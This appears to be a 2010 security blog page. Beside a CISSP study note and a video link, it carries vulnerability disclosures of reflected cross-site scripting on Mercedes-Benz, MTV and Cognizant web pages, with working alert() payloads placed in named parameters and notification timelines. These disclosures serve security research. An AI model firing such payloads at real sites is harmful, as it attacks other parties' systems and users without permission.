Monday, June 21, 2010

An interesting truth about what motivates us!

What Motivates us!
Came across this YouTube video by guys over at RSAnimate. An awesome animation / presentation on the motivating parameters for an individual and how they differ from the expected norms. A good watch...



Best Regards.

To CISSP Aspirants!

Hi folks,

In June 2009, I cleared ISC2 CISSP exam and posted my CISSP study plan. Since then, I have continuously been receiving comments and requests both on my blog post and offline at my email to share resources which I used to my preparation.

Although I have shared the appropriate websites and forum details in my CISSP Study Plan post above, getting study material together still appears challenging to many candidates. Therefore, I've decided to actively support all you CISSP aspirants through directing you to available study resources.

Request you everyone, please not to ask me for any exam dumps for CISSP study because there aren't any. What I am going to try and help you with would be the study material which you will need in your CISSP preparation.

Please put your request or any concern on my CISSP Study Plan post here http://ipositivesecurity.blogspot.com/2009/06/cissp-my-study-plan.html and I shall try and share the appropriate pointers in this post.

Wish you all the best in your pursuit to CISSP.

Best Regards.

Sunday, June 20, 2010

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++
http://en.wikipedia.org/wiki/Mercedes-Benz


+++Affected URL(s)+++
http://www.mercedes-benz.com/


+++Vulnerable Parameter / Function+++
'dsc_wdw'


+++PoC+++
Home Page -> Request Brochure
vuln parameter -> @dsc_wdw


+POST Request+
https://e-services.mercedes-benz.com/Dialog_RQB/RQB;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN


+Parameters+
dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002




Mercedes Benz Ist Notified: January 22, 2010
                                IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

MTV vulnerable to Cross Site Scripting (XSS)

+++About MTV+++
http://en.wikipedia.org/wiki/MTV


+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com


+++Vulnerable Parameter / Function+++
'q'
'search_term'


+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>


Think.MTV - http://think.mtv.com

http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=








MTV Ist Notified: January 06, 2010
          IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

Sunday, June 13, 2010

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++
We help transform core processes for greater flexibility, higher efficiency and lower costs. 
http://www.cognizant.com/html/aboutus/about-us.asp

+++Affected URL(s)+++
http://cognizant.com/html/insights/insightslandingpage.asp

-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++
'hidPageID''

+++PoC+++

POST Request
-> Case studies
hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
POST http://cognizant.com/html/insights/insightslandingpage.asp
global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3


Cognizant Ist Notified: February 23, 2010
                IInd Notification: March 29, 2010
Response Received: March 30, 2010
Current Status: Fixed (As of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.